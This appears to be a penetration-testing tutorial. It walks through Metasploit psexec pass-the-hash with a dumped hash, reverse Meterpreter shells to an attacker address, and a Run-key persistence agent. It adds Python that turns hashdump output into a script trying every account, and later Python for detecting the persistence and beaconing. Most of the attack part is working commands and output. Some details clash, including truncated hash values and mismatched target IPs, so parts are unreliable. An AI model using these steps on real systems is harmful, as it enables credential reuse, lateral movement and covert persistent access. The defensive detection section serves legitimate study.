Background
When we last left off, we had just opened a Meterpreter session on our internal client and done some looking around for other systems.
Process
So now that we have identified some systems, let's exploit one.
10.13.37.130 looks interesting. Judging by the open ports, it's probably a Windows system. Does Fred have an account on it? Let's find out with the Metasploit psexec module.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set SMBUSER fred
SMBUSER => fred
msf exploit(psexec) > set SMBPASS 921988ba001dc8e14a3b108f3cb6d:e19c5ee54e06b06a5907af13cef42
msf exploit(psexec) > set LPORT 80
msf exploit(psexec) > set LHOST 192.168.1.155
msf exploit(psexec) > set RHOST 10.13.37.130
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
Explanation
psexec is a powerful weapon against Windows machines. The module is modelled on the PsExec tool by Mark Russinovich, one of the excellent Windows tools in the Sysinternals section of microsoft.com: it authenticates over SMB, copies a service executable to the target's ADMIN$ share and starts it through the Service Control Manager, which is why the account used needs local administrator rights on the target. Metasploit adds one extra bonus: SMBPASS can be the LM:NT hash pair instead of the cleartext password. For more on how the pass-the-hash technique works, see http://oss.coresecurity.com/projects/pshtoolkit.htm. LPORT is set to 80 so the reverse connection uses a port the firewall lets out.
In the previous episode we dumped the password hashes from the first system with the hashdump command; the SMBPASS value above is fred's LM:NT pair from that dump, and we use it now.
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.1.155:80
[*] Connecting to the server...
[*] Authenticating as user 'fred'...
[*] Starting the service...
..
..
[*] Meterpreter session 2 opened (192.168.1.155:80 -> 192.168.1.156:56723)
Success. Fred does have an account on this host, and since the service started, it has administrator rights there too.
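To make the step from hashdump output to the SMBPASS value concrete, here is an added Python helper written for this post; it is example code, not part of Metasploit or the original write-up. It parses hashdump's user:rid:LM:NT::: lines, flags the empty-LM sentinel and the blank-password NT hash (both well-known values, not taken from the page), rejects hashes that are not 32 hex characters (which psexec will not accept), and emits a resource script that tries every usable account against the target. The sample dump lines, including the truncated `pasted` account, are constructed; the hosts and ports are the ones used above.

```python
"""hashdump lines -> psexec SMBPASS values, with sanity checks (added example)."""
import re

HEX32 = re.compile(r"^[0-9a-f]{32}$")
# Well-known sentinel values in hashdump output (facts about LM/NT hashing, not from the post).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM("") : LM storage disabled, or password > 14 chars
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT("") : account has a blank password

# Constructed sample hashdump output; 'pasted' simulates a hash copied with characters missing.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
fred:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
pasted:1002:e52cac67419a9a224a3b108f3fa6:8846f7eaee8fb117ad06bdd830b7:::
"""


def parse_hashdump(text):
    """Parse 'user:rid:LM:NT:::' lines into dicts; each records why it is or is not usable for psexec."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            entries.append({"line": lineno, "user": None, "usable": False,
                            "problems": ["not a hashdump line"]})
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        problems = []
        if not HEX32.match(lm):
            problems.append("LM hash is %d chars, psexec needs 32 hex" % len(lm))
        if not HEX32.match(nt):
            problems.append("NT hash is %d chars, psexec needs 32 hex" % len(nt))
        entries.append({
            "line": lineno, "user": user, "rid": rid, "lm": lm, "nt": nt,
            "lm_disabled": lm == EMPTY_LM,      # only the NT half carries information
            "blank_password": nt == EMPTY_NT,   # pass-the-hash is pointless; try an empty password
            "usable": not problems,
            "problems": problems,
        })
    return entries


def smbpass(entry):
    """The exact string for 'set SMBPASS': LM:NT, both halves present even when LM is the sentinel."""
    if not entry["usable"]:
        raise ValueError("%s: %s" % (entry["user"], "; ".join(entry["problems"])))
    return "%s:%s" % (entry["lm"], entry["nt"])


def psexec_rc(entries, rhost, lhost, lport=80):
    """Emit an msfconsole resource script that tries each usable, non-blank account against RHOST."""
    lines = ["use exploit/windows/smb/psexec",
             "set PAYLOAD windows/meterpreter/reverse_tcp",
             "set LHOST %s" % lhost,
             "set LPORT %d" % lport,
             "set RHOST %s" % rhost]
    for e in entries:
        if not e["usable"] or e["blank_password"]:
            continue
        # -z: do not interact with a session that opens, so the script moves on to the next account
        lines += ["set SMBUSER %s" % e["user"], "set SMBPASS %s" % smbpass(e), "exploit -z"]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    parsed = parse_hashdump(SAMPLE_HASHDUMP)
    for e in parsed:
        print(e["user"], "usable" if e["usable"] else e["problems"])
    print(psexec_rc(parsed, rhost="10.13.37.130", lhost="192.168.1.155", lport=80))
```

Save the script's output as a .rc file and load it with `msfconsole -r`, or `resource` from inside the console; the blank-password account is deliberately left out because an empty SMBPASS, not a hash, is what you would try there.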
meterpreter > ipconfig
Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC: 00:0c:29:6f:46:81
IP Address : 10.2.2.129
Netmask : 255.255.255.0
Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:6f:46:77
IP Address : 10.13.37.55
Netmask : 255.255.255.0
Excellent! This server is dual-homed, with a second interface on 10.2.2.0/24. We could start exploring that network right away, but first let's set this machine up as our pivot.
There are several ways to use Meterpreter as a backdoor.
We could run the metsvc script, which installs Meterpreter as a Windows service, but it is a bind payload: our machine has to connect in to a port on the target (the port is set in metsvc.rb, in the RPORT section). That won't work in our scenario, because the firewall blocks inbound connections.
We could also use msfpayload to generate a stand-alone executable and upload it to the server with Meterpreter. There are excellent examples of using msfpayload at synjukie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html.
But there is an even easier option, since we already have a Meterpreter session: the persistence script.
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.155
Explanation
-U starts the agent when the user logs on (it is installed under the HKCU Run key, so it runs as that user, not as SYSTEM)
-i 5 makes the agent try to connect back every 5 seconds
-p 443 and -r 192.168.1.155 are the port and IP the agent connects back to; 443 again because the firewall lets it out
[*] Creating a persistent agent: LHOST=192.168.1.155 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 611056 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\rRFCGIkV.vbs
[*] Agent executed with PID 312
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\RomCdWAl
[*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\RomCdWAl
[*] For cleanup use command: run multi_console_command -rc /.........../clean_up__20100917.5158.rc
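From the defender's side, the output above gives two things to hunt for: a Run-key value that launches a script from a temp directory, and a host that reconnects to one address and port every few seconds. The following Python is an added example, not part of the persistence script or the original post. The `reg query` output and the firewall log it reads are constructed to match the shape of what the script produced above (a random value name, a .vbs under C:\WINDOWS\TEMP, a 5-second interval); the jitter threshold and minimum connection count are assumptions to tune for your environment.

```python
"""Two checks for the persistence pattern above (added example; all sample data is constructed)."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed output of: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
SAMPLE_RUN_KEY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\fred\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    RomCdWAl    REG_SZ    C:\WINDOWS\TEMP\rRFCGIkV.vbs
    Updater     REG_SZ    wscript.exe //B "C:\Users\fred\AppData\Local\Temp\up.js"
"""

# Constructed firewall log: timestamp, internal source, destination:port, verdict.
SAMPLE_CONN_LOG = """\
2010-09-17 05:51:58 10.13.37.55 -> 192.168.1.155:443 allow
2010-09-17 05:52:03 10.13.37.55 -> 192.168.1.155:443 allow
2010-09-17 05:52:08 10.13.37.55 -> 192.168.1.155:443 allow
2010-09-17 05:52:09 10.13.37.55 -> 10.13.37.10:445 allow
2010-09-17 05:52:13 10.13.37.55 -> 192.168.1.155:443 allow
2010-09-17 05:52:18 10.13.37.55 -> 192.168.1.155:443 allow
2010-09-17 05:52:23 10.13.37.55 -> 192.168.1.155:443 allow
2010-09-17 05:53:40 10.13.37.55 -> 10.13.37.10:445 allow
"""

SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta|ps1|bat|cmd)\b", re.I)
SCRIPT_HOST = re.compile(r"\b(wscript|cscript|mshta|powershell|pwsh)(\.exe)?\b", re.I)
TEMP_DIR = re.compile(r"\\(temp|tmp)\\", re.I)
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*?)\s*$")
CONN_LINE = re.compile(r"^(\S+ \S+) (\S+) -> (\S+):(\d+) \w+$")


def suspicious_autoruns(reg_output):
    """Return [(value_name, data, [reasons])] for Run-key values that look like a dropped script agent."""
    hits = []
    for line in reg_output.splitlines():
        m = VALUE_LINE.match(line)
        if not m:
            continue  # header line or blank
        name, _type, data = m.groups()
        reasons = []
        if SCRIPT_EXT.search(data):
            reasons.append("launches a script file")
        if SCRIPT_HOST.search(data):
            reasons.append("invokes a script host")
        if TEMP_DIR.search(data):
            reasons.append("target lives in a temp directory")
        if reasons:
            hits.append((name, data, reasons))
    return hits


def beacon_candidates(log_text, min_connections=5, max_jitter=1.0):
    """Group connections by (src, dst, port) and report flows whose gaps are nearly constant.

    Returns [(src, dst, port, median_gap_seconds, connection_count)].
    A script that reconnects every N seconds shows up as a flow whose every gap sits within
    max_jitter of the median; min_connections keeps a handful of retries from triggering.
    """
    times = defaultdict(list)
    for line in log_text.splitlines():
        m = CONN_LINE.match(line)
        if not m:
            continue
        stamp = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        times[(m.group(2), m.group(3), int(m.group(4)))].append(stamp)
    found = []
    for key, stamps in times.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        median = statistics.median(gaps)
        if max(abs(g - median) for g in gaps) <= max_jitter:
            found.append(key + (median, len(stamps)))
    return found


if __name__ == "__main__":
    for name, data, reasons in suspicious_autoruns(SAMPLE_RUN_KEY):
        print("autorun %-10s %s  [%s]" % (name, data, ", ".join(reasons)))
    for src, dst, port, gap, n in beacon_candidates(SAMPLE_CONN_LOG):
        print("beacon  %s -> %s:%d every %.0fs (%d connections)" % (src, dst, port, gap, n))
```

The autorun check is deliberately noisy in the direction of script hosts and temp paths, because a legitimate installer has no business leaving a .vbs in C:\WINDOWS\TEMP to run at logon; review the hits rather than auto-deleting them, and keep the cleanup .rc from the persistence run if the host is your own lab box. The beacon check only sees connections the firewall logs, so it is most useful on an egress log for ports 80 and 443, which are exactly the ones the agent above was told to use.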
Keep the cleanup command from the last line: the .rc file it names is how you remove the agent and its Run key at the end of the engagement. Now let's exit all of our Meterpreter sessions.
meterpreter > exit
[*] Meterpreter session 2 closed. Reason: User exit
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...
Remove the route through this session, since we won't be needing it any more, then exit:
meterpreter > exit
Now set up the handler for the new payload:
msf exploit(psexec) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.155
LHOST => 192.168.1.155
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
and, as quick as you can say "Bob's your uncle",
[*] Started reverse handler on 192.168.1.155:443
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 192.168.1.156
[*] Meterpreter session 3 opened (192.168.1.155:443 -> 192.168.1.156:61943)
our persistence agent has connected back to us.
Next Steps
Exploring the next hop in the network, and using portfwd to reach RDP.